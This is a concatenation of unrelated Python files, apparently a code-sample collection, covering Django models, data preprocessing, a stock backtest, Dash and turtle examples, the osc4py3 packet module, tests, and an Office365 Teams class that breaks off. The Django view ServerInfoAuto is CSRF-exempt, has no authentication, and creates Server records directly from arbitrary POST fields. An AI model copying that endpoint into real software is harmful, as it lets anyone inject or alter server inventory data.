help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),
validators=[username_validator],
error_messages={
'unique': _("A user with that username already exists."),
},
)
first_name = models.CharField(verbose_name=_('first name'), max_length=30)
last_name = models.CharField(verbose_name=_('last name'), max_length=150)
email = models.EmailField(verbose_name=_('email address'), blank=True)
number = models.PositiveIntegerField(
verbose_name=_('学籍番号'),
unique=True,
validators=[MinValueValidator(10000), MaxValueValidator(99999)]
)
wallet = models.PositiveIntegerField(verbose_name=_('所持金額'), default=0)
is_staff = models.BooleanField(
verbose_name=_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin site.'),
)
is_active = models.BooleanField(
verbose_name=_('active'),
default=True,
help_text=_(
'Designates whether this user should be treated as active. '
'Unselect this instead of deleting accounts.'
),
)
date_joined = models.DateTimeField(verbose_name=_('date joined'), default=timezone.now)
objects = UserManager()
EMAIL_FIELD = 'email'
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['first_name', 'last_name', 'email', 'number']
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
def save(self, *args, **kwargs):
if self.wallet < 0:
raise CustomError('残高が足りません')
super().save(*args, **kwargs)
def clean(self):
super().clean()
self.email = self.__class__.objects.normalize_email(self.email)
def get_full_name(self):
"""
Return the first_name plus the last_name, with a space in between.
"""
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
"""Return the short name for the user."""
return self.first_name
def email_user(self, subject, message, from_email=None, **kwargs):
"""Send an email to this user."""
send_mail(subject, message, from_email, [self.email], **kwargs)
class IDmField(models.CharField):
description = _("FeliCa's IDm")
default_validators = [
RegexValidator(regex='^[0-9A-F]{16}$', message=_("IDm must be 16-digit hexadecimal number")),
MinLengthValidator(16)
]
def __init__(self, *args, **kwargs):
kwargs.setdefault('verbose_name', 'FeliCa ID')
kwargs.setdefault('unique', True)
kwargs['max_length'] = 16
super().__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs["max_length"]
return name, path, args, kwargs
class Card(models.Model):
is_guest = models.BooleanField(verbose_name='ゲスト', default=False)
name = models.CharField(verbose_name='カード名', max_length=100)
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='cards', verbose_name='所持ユーザー')
idm = IDmField()
class Meta:
verbose_name = _('ICカード')
verbose_name_plural = _('ICカード')
def save(self, *args, **kwargs):
self.full_clean()
super().save(*args, **kwargs)
class Temporary(models.Model):
idm = IDmField()
uuid = models.UUIDField(verbose_name='UUID', default=uuid.uuid4, editable=False)
class Meta:
verbose_name = _('紐づけデータ')
verbose_name_plural = _('紐づけデータ')
def save(self, *args, **kwargs):
self.full_clean()
super().save(*args, **kwargs)
def get_user_from_idm(idm):
return User.objects.get(cards__idm=idm)
class Invitation(models.Model):
uuid = models.UUIDField(verbose_name='UUID', primary_key=True, default=uuid.uuid4(), editable=False)
is_active = models.BooleanField(verbose_name='有効性', default=True)
generated_time = models.DateTimeField(verbose_name='生成された時間', default=timezone.now)
registered_user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='invitations', verbose_name='登録ユーザー', blank=True, null=True)
class Meta:
verbose_name = _('招待')
verbose_name_plural = _('招待')
|
import pandas as pd
from sklearn.preprocessing import LabelEncoder
from scipy.stats import zscore
from sklearn.preprocessing import scale
import numpy as np
import warnings
warnings.filterwarnings("ignore")
def encode_label(df):
print("Encode labels ...")
le = LabelEncoder()
return le.fit_transform(df)
def preprocess_data(df, features_columns, label=None, z_score=False, standardize=False):
print("------------------------------------------")
print(" Preprocessing data ")
print("------------------------------------------")
print("Get dataset")
print("Shape of the data to process : " + str(df.shape))
print("------------------------------------------")
# Create inputs and labels
# label
if label is not None:
print("Extract labels ...")
df_labels = df['genre']
# inputs
print("Extract inputs ...")
df = df[features_columns]
# Remove outliers
if z_score:
print("Remove outliers with zscore ...")
z_scores = zscore(df)
abs_z_scores = np.abs(z_scores)
filtered_entries = (abs_z_scores < 4).all(axis=1)
df = df[filtered_entries]
if label is not None:
df_labels = df_labels[filtered_entries]
# Strandardize : center reduce
if standardize:
print("Center and reduce inputs ...")
df = scale(df, axis=0, with_mean=True, with_std=True)
df = pd.DataFrame(df, columns=features_columns)
print("------------------------------------------")
print("Data shape after preprocessing : " + str(df.shape))
if label is not None:
print("Labels shape : " + str(df_labels.shape))
print("Return dataset(s) ...")
print("Preprocessing finished")
print("------------------------------------------")
if label is not None:
df_labels = pd.DataFrame(df_labels, columns=["genre"])
res = (df, df_labels)
else:
res = df
return res
def preprocess_data_exo2(df, features_columns, z_score=False, standardize=False):
print("------------------------------------------")
print(" Preprocessing data exo2 ")
print("------------------------------------------")
print("Get dataset")
print("------------------------------------------")
# inputs
print("Extract inputs ...")
df_features = df[features_columns]
print("Shape of the data to process : " + str(df.shape))
# Remove outliers
if z_score:
print("Remove outliers with zscore ...")
z_scores = zscore(df_features)
abs_z_scores = np.abs(z_scores)
filtered_entries = (abs_z_scores < 4).all(axis=1)
# Keeping non-outliers elements
df = df[filtered_entries]
# Strandardize : center reduce
if standardize:
print("Center and reduce inputs ...")
features_matrix = scale(df_features, axis=0, with_mean=True, with_std=True)
df_features = pd.DataFrame(features_matrix, columns=features_columns)
df.loc[:, features_columns] = df_features
print("------------------------------------------")
print("Data shape after preprocessing : " + str(df.shape))
print("Return dataset(s) ...")
print("Preprocessing finished")
print("------------------------------------------")
return df
|
from zimsoap import zobjects
class MethodMixin:
def create_signature(self, name, content, contenttype="text/html"):
"""
:param: name verbose name of the signature
:param: content content of the signature, in html or plain-text
:param: contenttype can be "text/html" (default) or "text/plain"
:returns: a zobjects.Signature object
"""
s = zobjects.Signature(name=name)
s.set_content(content, contenttype)
resp = self.request('CreateSignature', {'signature': s.to_creator()})
return zobjects.Signature.from_dict(resp['signature'])
def get_signatures(self):
""" Get all signatures for the current user
:returns: a list of zobjects.Signature
"""
signatures = self.request_list('GetSignatures')
return [zobjects.Signature.from_dict(i) for i in signatures]
def get_signature(self, signature):
"""Retrieve one signature, discriminated by name or id.
Note that signature name is not case sensitive.
:param: a zobjects.Signature describing the signature
like "Signature(name='my-sig')"
:returns: a zobjects.Signature object, filled with the signature if no
signature is matching, returns None.
"""
resp = self.request_list('GetSignatures')
# GetSignature does not allow to filter the results, so we do it by
# hand...
if resp and (len(resp) > 0):
for sig_dict in resp:
sig = zobjects.Signature.from_dict(sig_dict)
if hasattr(signature, 'id'):
its_this_one = (sig.id == signature.id)
elif hasattr(signature, 'name'):
its_this_one = (sig.name.upper() == signature.name.upper())
else:
raise ValueError('should mention one of id,name')
if its_this_one:
return sig
else:
return None
def delete_signature(self, signature):
""" Delete a signature by name or id
:param: signature a Signature object with name or id defined
"""
self.request('DeleteSignature', {'signature': signature.to_selector()})
def modify_signature(self, signature):
""" Modify an existing signature
Can modify the content, contenttype and name. An unset attribute will
not delete the attribute but leave it untouched.
:param: signature a zobject.Signature object, with modified
content/contentype/name, the id should be present and
valid, the name does not allows to identify the
signature for that operation.
"""
# if no content is specified, just use a selector (id/name)
dic = signature.to_creator(for_modify=True)
self.request('ModifySignature', {'signature': dic})
|
# Euler 47.Distinct primes factors
import math
def factor(n):
if n <= 1: return []
prime = next((x for x in range(2, math.ceil(math.sqrt(n))+1) if n%x == 0), n)
return [prime] + factor(n//prime)
n=4
i=0
end=0
while True:
i+=1
l=len(set(factor(i)))
if l != n:
end=0
else:
end+=1
if end==n:
result=i-n+1
break
print(result) |
import datetime
import logging
import tushare as ts
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from tensorflow import keras
import tensorflow as tf
from ts.st_history_data import x_train_col_index, column_names, load_data, code
logging.basicConfig(level=logging.INFO)
#显示所有列
pd.set_option('display.max_columns', None)
#显示所有行
pd.set_option('display.max_rows', None)
#设置value的显示长度为100,默认为50
pd.set_option('max_colwidth',100)
df = ts.get_hist_data(code, start='2018-11-01', end='2018-11-30', ktype='60')
df = df.sort_values(axis=0, ascending=True, by='date')
# 目标价格
target_price = {'min_change': -0.02, 'max_change': 0.02}
# 账户总额
account_init = 10000
account_total = account_init
change_fee = 0.0
change_unit = 100
# 股票总额
stock_total = 0
data_count = len(df)
day = 0
T0 = 0
T1 = 0
logging.info("data count:%s", data_count)
new_model = keras.models.load_model(code + '_p_change_model.h5')
logging.info(new_model.summary())
def sell_fee(change_unit, price):
s_fee = change_unit * price * 0.0001 + change_unit * price * 0.0003 + change_unit / 1000 * 1
global change_fee
change_fee = change_fee + s_fee
return s_fee
def buy_fee(change_unit, price):
b_fee = change_unit * price * 0.0001 + change_unit / 1000 * 1
global change_fee
change_fee = change_fee + b_fee
return b_fee
def print_account():
logging.info("account_init:%f,account_total:%f, account pre:%f, stock:%f, price:%f, target_price:%s, change_fee:%s",
account_init,
account_total,
(account_total - account_init) / account_init * 100, stock_total, price, target_price, change_fee)
def get_target_price(index):
(train_data, train_labels), (test_data, test_labels) = load_data()
today = datetime.datetime.strptime(index, '%Y-%m-%d %H:%M:%S')
yesterday = today - datetime.timedelta(days=1)
yesterday_df = ts.get_hist_data(code, start=yesterday.strftime('%Y-%m-%d'), end=yesterday.strftime('%Y-%m-%d'))
today_df = ts.get_hist_data(code, start=today.strftime('%Y-%m-%d'), end=today.strftime('%Y-%m-%d'))
logging.debug("yesterday_df:%s", yesterday_df)
if len(yesterday_df) == 0:
return get_target_price(yesterday.strftime('%Y-%m-%d') + ' 00:00:01')
stock_data = np.array(yesterday_df)
columns = yesterday_df.columns.values.tolist()
x_train_col = x_train_col_index(columns, column_names)
x = np.array(stock_data[:, x_train_col])
optimizer = tf.train.RMSPropOptimizer(0.001)
if len(x) == 0:
return 0
new_model.compile(loss='mse',
optimizer=optimizer,
metrics=['mae'])
mean = train_data.mean(axis=0)
std = train_data.std(axis=0)
x = (x - mean) / std
logging.debug("x:%s", x)
test_predictions = new_model.predict(x).flatten()[0]
today_p_change = today_df['p_change']
logging.info("test_predictions:%f, today_df:%s, loss:%f", test_predictions, today_p_change, test_predictions-test_predictions)
target_price['min_change'] = test_predictions * 0.01
target_price['max_change'] = test_predictions * 0.09
return test_predictions
old_index = ''
for index, row in df.iterrows():
day = day + 1
price = float(row["open"] + row["price_change"])
p_change = float(row["p_change"])
date = index.split(' ')[0]
if old_index != date:
old_index = date
T1 = T1 + T0
T0 = 0
train_val = get_target_price(index)
logging.debug("old_index:%s, target_price:%s, train_val:%s", old_index, target_price, train_val)
if float(train_val) < 2 or float(train_val) > 8:
if day == data_count:
logging.info("清空")
account_total = account_total + T1 * price - sell_fee(T1, price)
T1 = 0
print_account()
continue
if -1 > float(train_val) - p_change > 1:
continue
if p_change < target_price['min_change']:
logging.debug("buy")
print_account()
if account_total > (change_unit * price):
account_total = account_total - change_unit * price - buy_fee(change_unit, price)
T0 = T0 + change_unit
if p_change > target_price['max_change']:
logging.debug("sell")
print_account()
if T1 > change_unit:
account_total = account_total + change_unit * price - sell_fee(change_unit, price)
T1 = T1 - change_unit
if day == data_count:
logging.info("清空")
account_total = account_total + T1 * price - sell_fee(T1, price)
T1 = 0
print_account()
|
import dash_bootstrap_components as dbc
from dash import Input, Output, State, html
modal = html.Div(
[
dbc.Button("Small modal", id="open-sm", className="me-1", n_clicks=0),
dbc.Button("Large modal", id="open-lg", className="me-1", n_clicks=0),
dbc.Button("Extra large modal", id="open-xl", n_clicks=0),
dbc.Modal(
[
dbc.ModalHeader(dbc.ModalTitle("Header")),
dbc.ModalBody("A small modal."),
],
id="modal-sm",
size="sm",
is_open=False,
),
dbc.Modal(
[
dbc.ModalHeader(dbc.ModalTitle("Header")),
dbc.ModalBody("A large modal."),
],
id="modal-lg",
size="lg",
is_open=False,
),
dbc.Modal(
[
dbc.ModalHeader(dbc.ModalTitle("Header")),
dbc.ModalBody("An extra large modal."),
],
id="modal-xl",
size="xl",
is_open=False,
),
]
)
def toggle_modal(n1, is_open):
if n1:
return not is_open
return is_open
app.callback(
Output("modal-sm", "is_open"),
Input("open-sm", "n_clicks"),
State("modal-sm", "is_open"),
)(toggle_modal)
app.callback(
Output("modal-lg", "is_open"),
Input("open-lg", "n_clicks"),
State("modal-lg", "is_open"),
)(toggle_modal)
app.callback(
Output("modal-xl", "is_open"),
Input("open-xl", "n_clicks"),
State("modal-xl", "is_open"),
)(toggle_modal)
|
from turtle import *
from turtle import *
fd(100)
lt (90)
fd (100)
lt (90)
fd (100)
lt (90)
fd (100)
done()
done() |
import pickle
import os
p = os.path.abspath('..')
# Read the data from pickle file
def read_data_from_pickle(file_name):
file = open('dataset/'+file_name, 'rb')
data = pickle.load(file)
return data
# Write the data from pickle file
def write_data_to_pickle(file_name, data):
file = open('dataset/'+file_name, 'wb')
pickle.dump(data, file)
|
import os.path
import glob
from .util import split2list
from .listdataset import ListDataset
from random import shuffle
def make_dataset(input_dir,split,net_name,target_dir=None):
plyfiles = []
if(net_name== 'GAN'):
for dirs in os.listdir(input_dir):
tempDir = os.path.join(input_dir, dirs)
for input in glob.iglob(os.path.join(tempDir, '*.npy')):
input = os.path.basename(input)
root_filename = input[:-4]
plyinput = dirs + '/' + root_filename + '.npy'
plyfiles.append([plyinput])
if(net_name == 'auto_encoder'):
target_dir = input_dir
for dirs in os.listdir(target_dir):
tempDir = os.path.join(input_dir,dirs)
for target in glob.iglob(os.path.join(tempDir,'*.ply')):
target = os.path.basename(target)
root_filename = target[:-4]
plytarget = dirs + '/' + root_filename + '.ply'
plyinput = plytarget
plyfiles.append([[plyinput],[plytarget]])
if (net_name == 'shape_completion'): # TODO remove this sometime
for dirs in os.listdir(input_dir):
temp_In_Dir = os.path.join(input_dir, dirs)
temp_Tgt_Dir = os.path.join(target_dir, dirs)
for target in glob.iglob(os.path.join(temp_In_Dir, '*.ply')):
target = os.path.basename(target)
root_filename = target[:-9]
plytarget = dirs + '/' + root_filename + '.ply'
plyin = dirs + '/' + target
plyfiles.append([[plyin], [plytarget]])
if split== None:
return plyfiles, plyfiles
else:
return split2list(plyfiles, split, default_split=split)
def shapenet(input_root, target_root, split, net_name='auto_encoder', co_transforms= None, input_transforms = None, target_transforms= None, args=None,give_name=False):
[train_list,valid_list] = make_dataset(input_root, split, net_name, target_root)
train_dataset = ListDataset(input_root,target_root,train_list,net_name, co_transforms, input_transforms, target_transforms,args,mode='train',give_name=give_name)
shuffle(valid_list)
valid_dataset = ListDataset(input_root,target_root,valid_list,net_name, co_transforms, input_transforms, target_transforms,args,mode='valid',give_name=give_name)
return train_dataset,valid_dataset |
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# File: osc4py3/oscdistributing.py
# <pep8 compliant>
"""Distribute packets between low and high layers.
This call encoding/decoding functions, exchange packets between the
sending and dispatching layer dealing with OSCMessage and OSCBundle,
and the communication layer writing and reading raw data via channels.
"""
import time
import collections
import threading
import queue
from . import oscchannel
from . import oscbuildparse
from . import oscscheduling
from . import oscpacketoptions
from . import oscdispatching
SendingPacket = collections.namedtuple("SendingPacket",
"packet packopt targets")
sending_packets = queue.Queue()
# Same for sending packet thread.
# Tested on identity too.
LAST_SENDINGPACKET = SendingPacket(None, None, None)
# Reserved names unusable for channel names.
# Note that we reserve all names starting by '_'.
RESERVED_NAMES = {
"_all", # To address all channels.
"_local", # To bypass peers/channels and dispatch locally.
}
# Thread to process raw packets if not managed by polling loop.
rawpackets_thread = None
rawpackets_terminate = False
# Thread to process sent packets if not managed by polling loop.
sendpackets_thread = None
sendpackets_terminate = False
# ============================ INTERNAL FUNCTIONS ==========================
def next_sendpacket(timeout):
"""Return next packet and options to send.
:param timeout: maximum time to wait for another packet to send, 0 for
immediate return, None for infinite wait.
:type timeout: float or None
:return: informations about packet to send, data, options, targets
:rtype: SendingPacket named tuple or None if no data available
"""
if timeout == 0: # Would not block.
if sending_packets.empty():
return None
try:
return sending_packets.get(True, timeout)
except queue.Empty:
return None
def post_sendpacket(sendingpacket):
"""Send a new packet in the reception queue.
:param sendingpacket: packet and packet options to send.
:type sendingpacket: SendingPacket
"""
sending_packets.put(sendingpacket)
def flat_names(names, _out=None):
"""Flatten nested names containers into a set.
:param names: nested structures containing names.
:type names:
:return: all names found in the structures, in one set.
:rtype: set
"""
# Called recursively with an (modified) _out argument.
# Top call dont provide the _out argument and use the returned value.
if _out is None:
_out = set()
if isinstance(names, str):
_out.add(names)
else: # Assume _names is iterable (list, tuple, dict, set...)
for n in names:
if isinstance(n, str): # Avoid too much recursions.
_out.add(names)
else:
flat_names(n, _out)
return _out
# ========================== PUBLIC SENDING FUNCTION ========================
def send_packet(packet, names, packopt=None):
"""Send an OSC message or bundle via some channels.
The names can use some reserved names:
* _all To address all standard writer channels.
An later maybe:
* _filter To select standard writer channels with filtering
on addrpattern matching.
:param packet: the bundle or message to send.
:type packet: OSCMessage or OSCBundle
:param names: names to select what channels to use.
:type names: str or nested containers of str
:param packopt: options for sending the packet.
:type packopt: PacketOptions
"""
# Make peername a set of target.
targets = flat_names(names)
if packopt is None:
packopt = oscpacketoptions.PacketOptions()
if packopt.nodelay:
# Call the send function with no queue.
packet_send_function(packet, packopt, targets)
else:
# Queue the packet to not consume time here.
post_sendpacket(SendingPacket(packet, packopt, targets))
# ========================= INTERNAL SENDING FUNCTIONS ======================
def packet_send_function(packet, packopt, targets, logger):
"""Identify peers / channels, and manage transmission.
Proceed packet sending operations with managing multiple destinations
with as common operations as possible.
:param packet: the bundle or message to send.
:type packet: OSCMessage or OSCBundle
:param packopt: the options for packet transmission.
:type packopt: PacketOptions
:param targets: targetted peers names or channel names.
:type targets: set
:param logger: Python logger to trace activity.
Default to None
:type logger: logging.Logger
"""
if logger is not None:
logger.debug("OSC packet_send_function to targets %r with %s",
targets, packet)
if "_local" in targets:
targets.remove("_local")
# Directly call dispatching function, not going through OSC packet
# sending via network & co.
oscdispatching.globdisp().dispatch_packet(packet, packopt)
if not targets: # There was only local delivery
return
# Selection of channel names with special names.
if "_all" in targets:
targets.remove("_all")
for name in oscchannel.all_channels:
# We only select channels which are writers.
chan = oscchannel.get_channel(name)
if chan.is_writer:
targets.add(name)
# Names of channels who will receive the packet with standard processing.
stdchannels = set()
for cname in targets:
chan = oscchannel.get_channel(cname)
if chan is None:
if logger is not None:
logger.error("OSC packet_send_function have unknown "\
"targets channel %r", cname)
continue
res = chan.handle_action("encodepacket", (packet, packopt))
if res == (None, None):
# The action handler must have completly processed the packet,
# including transmission.
continue
elif res is None:
# No interesting processing, will directly send the same encoded
# packet to the channel like others.
stdchannels.add(cname)
else:
# The action handler encode the packet from its own, and may have
# modified packet options - directly transmit the result of its
# processing.
transmit_rawpacket(res[0], res[1], {cname}, logger)
# Now, transmit to all channels accepting direct transmission (ie. with
# no special encoding).
if stdchannels:
rawoscdata = oscbuildparse.encode_packet(packet)
transmit_rawpacket(rawoscdata, packopt, stdchannels, logger)
def transmit_rawpacket(rawpacket, packopt, writersnames, logger):
"""Call writer channels functions to transmit raw data.
This function transmit the *same* raw OSC packet to a set of transport
channels.
:param rawpacket: the binary packet to write.
:type rawpacket: bytes or bytearray
:param packopt: the options for packet transmission.
:type packopt: PacketOptions
:param writersnames: set of names of writers to send data.
:type writersnames: { str }
:param logger: Python logger to trace activity.
Default to None
:type logger: logging.Logger
:param workqueue: queue of works to planify transmissions in multiple
threads or in a late event loop execution.
"""
if logger is not None:
logger.debug("OSC transmit_rawpacket to channels %r", writersnames)
for cname in writersnames:
chanel = oscchannel.get_channel(cname)
if chanel is None:
if logger is not None:
logger.error("OSC transmit_rawpacket, channel name "\
"%r is not referenced", cname)
continue # Dismiss the packet.
if not chanel.is_writer:
if logger is not None:
logger.error("OSC transmit_rawpacket, channel name "\
"%r is not a writer", cname)
continue # Dismiss the packet.
newopt = packopt.duplicate()
newopt.chantarget = cname
chanel.transmit_data(rawpacket, newopt)
# ====================== EVENT LOOP PUBLIC FUNCTIONS ======================
def sendingpackets_process_loop(deadlinetime=0, logger=None):
"""Manage encoding and sending of packets.
Called as a thread entry point, or as a simple function in a envent
loop.
:param deadlinetime: exit from loop after this time, even if there are
remaining packets to send. Its an *absolute* time in seconds,
in same time base as time.time().
A 0 value do process all packets until the queue is empty then return.
A None value is used when in own thread.
:param deadlinetime: float or None
:param logger: Python logger to trace activity.
Default to None
:type logger: logging.Logger
"""
try:
if deadlinetime is None and logger is not None:
logger.info("OSC Starting sendingpackets_process_loop()")
while True:
timeout = oscscheduling.deadline2timeout(deadlinetime)
nextsend = next_sendpacket(timeout)
# If no packet while in own thread, continue with waiting.
if nextsend is None and deadlinetime is None:
continue
# If no packet while in event loop, return.
if nextsend is None and deadlinetime == 0:
return
# Proper termination via a special tuple.
if nextsend is LAST_SENDINGPACKET:
if sendpackets_terminate:
break # Properly exit from function (from thread...)
else:
nextsend = None
if nextsend is not None:
if logger is not None:
logger.debug("OSC send packets processing %r", nextsend)
packet, packopt, targets = nextsend
packet_send_function(packet, packopt, targets, logger)
# If has deadline elapsed, continue with waiting.
if deadlinetime and time.time() > deadlinetime:
break
if deadlinetime is None and logger is not None:
logger.info("OSC Finishing sendingpackets_process_loop()")
except:
if logger is not None:
logger.exception("OSC Failure in sendingpackets_process_loop()")
def rawpackets_process_loop(deadlinetime=0, logger=None):
"""Called by readers when some raw data come from the system.
Process all queued packets until the queue is empty or a the deadlinetime
is reach.
:param deadlinetime: exit from loop after this time, even if there are
remaining packets to process. Its an *absolute* time in seconds,
in same time base as time.time().
A 0 value do process all messages until the queue is empty then return.
A None value is used when in own thread.
:param deadlinetime: float or None
:param logger: Python logger to trace activity.
Default to None
:type logger: logging.Logger
"""
try:
if deadlinetime is None and logger is not None:
logger.info("OSC Starting rawpackets_process_loop()")
while True:
timeout = oscscheduling.deadline2timeout(deadlinetime)
nextpacket = oscchannel.next_rawpacket(timeout)
# If no packet while in event loop, return.
if nextpacket is None and deadlinetime == 0:
return
# If no packet while in own thread, continue with waiting.
if nextpacket is None and deadlinetime is None:
continue
# Proper termination via a special tuple.
if nextpacket == oscchannel.LAST_RAWPACKET:
if rawpackets_terminate:
break # Properly exit from function (from thread...)
else:
nextpacket = None
if nextpacket is not None:
if logger is not None:
logger.debug("OSC raw packet processing %r", nextpacket)
# Identify peer manager for decoding.
rawoscdata, packopt = nextpacket
readername = packopt.readername
chan = oscchannel.get_channel(readername)
if chan is None:
# This should never occure (!)
if logger is not None:
logger.error("OSC raw packet from unknown %r channel",
readername)
continue
res = chan.handle_action("decodepacket", (rawoscdata, packopt))
if res == (None, None):
# The action handler must have completly processed the
# packet, including dispatching.
packet = packopt = None
elif res is None:
# No interesting processing, we decode the packet
# ourself and it will be dispatched.
packet = oscbuildparse.decode_packet(rawoscdata)
else:
# The action handler decode the packet from its own, and
# may have modified packet options - directly use
# the result of this processing.
packet, packopt = res
if packet is not None:
oscdispatching.globdisp().dispatch_packet(packet, packopt)
# If has deadline elapsed, continue with waiting.
if deadlinetime and time.time() > deadlinetime:
break
if deadlinetime is None and logger is not None:
logger.info("OSC Finishing rawpackets_process_loop()")
except:
if logger is not None:
logger.exception("OSC Failure in rawpackets_process_loop()")
# ================== BACKGROUND THREADS PUBLIC FUNCTIONS ===================
def create_rawpackets_thread(logger=None):
"""Build a thread to manage dispatching messages by calling functions.
:param logger: Python logger to trace activity.
Default to None
:type logger: logging.Logger
"""
global rawpackets_terminate, rawpackets_thread
if rawpackets_thread is not None:
return
rawpackets_terminate = False
rawpackets_thread = threading.Thread(target=rawpackets_process_loop,
args=(None, logger), # Its not polling.
name="RawPackThread")
rawpackets_thread.daemon = False
rawpackets_thread.start()
def terminate_rawpackets_thread():
"""Set a flag and signal condition variable to finish delayed thread.
Wait for the effective thread termination.
Note: remaining packets in the received queue are ignored.
"""
global rawpackets_terminate, rawpackets_thread
rawpackets_terminate = True
oscchannel.post_rawpacket(oscchannel.LAST_RAWPACKET)
rawpackets_thread.join()
rawpackets_thread = None
def create_sendingpackets_thread(logger=None):
"""Build a thread to manage dispatching messages by calling functions.
:param logger: Python logger to trace activity.
Default to None
:type logger: logging.Logger
"""
global sendpackets_thread, sendpackets_terminate
if sendpackets_thread is not None:
return
sendpackets_terminate = False
sendpackets_thread = threading.Thread(target=sendingpackets_process_loop,
args=(None, logger), # Its not polling.
name="SendPackThread")
sendpackets_thread.daemon = False
sendpackets_thread.start()
def terminate_sendingpackets_thread():
"""Set a flag and signal condition variable to finish delayed thread.
Wait for the effective thread termination.
Note: remaining packets in the received queue are ignored.
"""
global sendpackets_thread, sendpackets_terminate
sendpackets_terminate = True
post_sendpacket(LAST_SENDINGPACKET)
sendpackets_thread.join()
sendpackets_thread = None
|
import argparse
from obfuscator_source.file_handler import ObfuscationFileHandler
def main():
arg_parser = argparse.ArgumentParser(description='A python obfuscator that will obfuscate names using the ast library.')
arg_parser.add_argument('--obfuscated_folder_path', required=True, help='Folder to save obfuscated code in')
arg_parser.add_argument('--directory', help='Directory containing python files to obfuscate(Can only target either directory or file but not both)')
arg_parser.add_argument('--file', help='File to obfuscate(Can only target either directory or file but not both)')
args = arg_parser.parse_args()
assert_valid_arguments(args)
obfuscation_handler = ObfuscationFileHandler(args.obfuscated_folder_path)
if args.directory:
obfuscation_handler.run_obfuscator_directory(args.directory)
else:
obfuscation_handler.run_obfuscator_file(args.file)
def assert_valid_arguments(args):
assert args.directory or args.file, "No File or Directory provided."
assert not (args.directory and args.file), "Can only target either directory or file but not both"
if __name__ == '__main__':
exit(main())
|
import unittest
from unittest import mock
from earthquake.eq_item import EarthquakeItem
from earthquake.steps_converter import StepperStepsConverter, StepItem, ScalingDelegateStepsConverter, StepsConverter, \
DelegateDeltaStepsConverter
class TestStepperStepsConverter(unittest.TestCase):
def test(self):
fixture = [
EarthquakeItem(9.8, 10),
EarthquakeItem(9.8, 20),
EarthquakeItem(9.8, 30)
]
sut = StepperStepsConverter(2)
result = sut.convert_to_steps(fixture)
count = 0
for i, r in enumerate(result):
self.assertAlmostEqual(
0.5 * 9.8 * (i * 2 + 2) ** 2,
r.value, delta=0.00001, msg='Error in {}'.format(i)
)
count += 1
self.assertEqual(15, count)
class TestScalingDelegateStepsConverter(unittest.TestCase):
def test(self):
fixture = [
StepItem(x) for x in range(10)
]
delegate = mock.create_autospec(StepsConverter)
delegate.convert_to_steps.return_value = fixture
sut = ScalingDelegateStepsConverter(delegate, 123.0)
result = sut.convert_to_steps(mock.ANY)
count = 0
for i, r in enumerate(result):
self.assertEqual(123.0 * i, r.value)
count += 1
self.assertEqual(len(fixture), count)
class TestDelegateDeltaStepsConverter(unittest.TestCase):
def test(self):
fixture = [
StepItem(x) for x in range(10)
]
delegate = mock.create_autospec(StepsConverter)
delegate.convert_to_steps.return_value = fixture
sut = DelegateDeltaStepsConverter(delegate)
result = sut.convert_to_steps(mock.ANY)
count = 0
for r in result:
self.assertEqual(1, r.value)
count += 1
self.assertEqual(len(fixture) - 1, count)
|
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from resources.models import Server
import datetime
@csrf_exempt
def ServerInfoAuto(request):
if request.method == "POST":
data = request.POST.dict()
data['check_update_time'] = datetime.datetime.now()
try:
s=Server.objects.get(uuid__exact=data['uuid'])
s.save(update_fields=["check_update_time"])
'''
Server.objects.filter(uuid=data['uuid']).update(**data)
s.save(update_fields=['hostname'])
'''
except Server.DoesNotExist:
s = Server(**data)
s.save()
return HttpResponse("")
|
# -*- coding:utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Category(models.Model):
name = models.CharField(max_length = 255, verbose_name = u'Kategori İsmi')
slug = models.SlugField(max_length = 255, verbose_name = u'Kategori Slug')
description = models.TextField(verbose_name=u'Açıklama', null = True, blank = True)
active = models.BooleanField(verbose_name = u'Aktif', default=True)
def __unicode__(self):
return self.name
class Meta:
verbose_name = _(u'Kategori')
verbose_name_plural = _(u'Kategoriler')
class Product(models.Model):
name = models.CharField(max_length = 255, verbose_name = u'Ürün İsmi')
slug = models.SlugField(max_length = 255, verbose_name = u'Ürün Slug',
help_text=u'Ürün ismini yazarken otomatik olarak bu alan doldurulucaktır.')
category = models.ForeignKey(Category,null = True, blank = True, verbose_name = u'Kategori')
description = models.TextField(verbose_name=u'Açıklama', null = True, blank = True)
price = models.DecimalField(decimal_places = 2, max_digits = 10, verbose_name = u'Ürün Fiyatı',
help_text=u'Ürünün fiyatını giriniz.')
kdv = models.DecimalField(decimal_places = 2, max_digits = 10, verbose_name = u'KDV Fiyatı',
help_text=u'Ürünün kdv tutarını giriniz.')
total_price = models.DecimalField(decimal_places = 2, max_digits = 10, verbose_name = u'Toplam Fiyatı')
order = models.IntegerField(default = 0, verbose_name = u'Ürün Sıralması')
active = models.BooleanField(verbose_name = u'Aktif', default=True)
def __unicode__(self):
return self.name
class Meta:
verbose_name = _(u'Ürün')
verbose_name_plural = _(u'Ürünler')
|
from office365.entity import Entity
from office365.runtime.queries.service_operation_query import ServiceOperationQuery
from office365.runtime.queries.update_entity_query import UpdateEntityQuery
from office365.runtime.resource_path import ResourcePath
from office365.teams.channel import Channel
from office365.teams.channelCollection import ChannelCollection
from office365.teams.schedule import Schedule
from office365.teams.teamFunSettings import TeamFunSettings
from office365.teams.teamGuestSettings import TeamGuestSettings
from office365.teams.teamMemberSettings import TeamMemberSettings
from office365.teams.teamMessagingSettings import TeamMessagingSettings
from office365.teams.teamsAppInstallationCollection import TeamsAppInstallationCollection
from office365.teams.teamsAsyncOperationCollection import TeamsAsyncOperationCollection
class Team(Entity):
"""A team in Microsoft Teams is a collection of channel objects. A channel represents a topic, and therefore a
logical isolation of discussion, within a team. """
def __init__(self, context, resource_path=None, properties=None):
super().__init__(context, resource_path, properties)
self.memberSettings = TeamMemberSettings()
self.guestSettings = TeamGuestSettings()
self.messagingSettings = TeamMessagingSettings()
self.funSettings = TeamFunSettings()
@property
def channels(self):
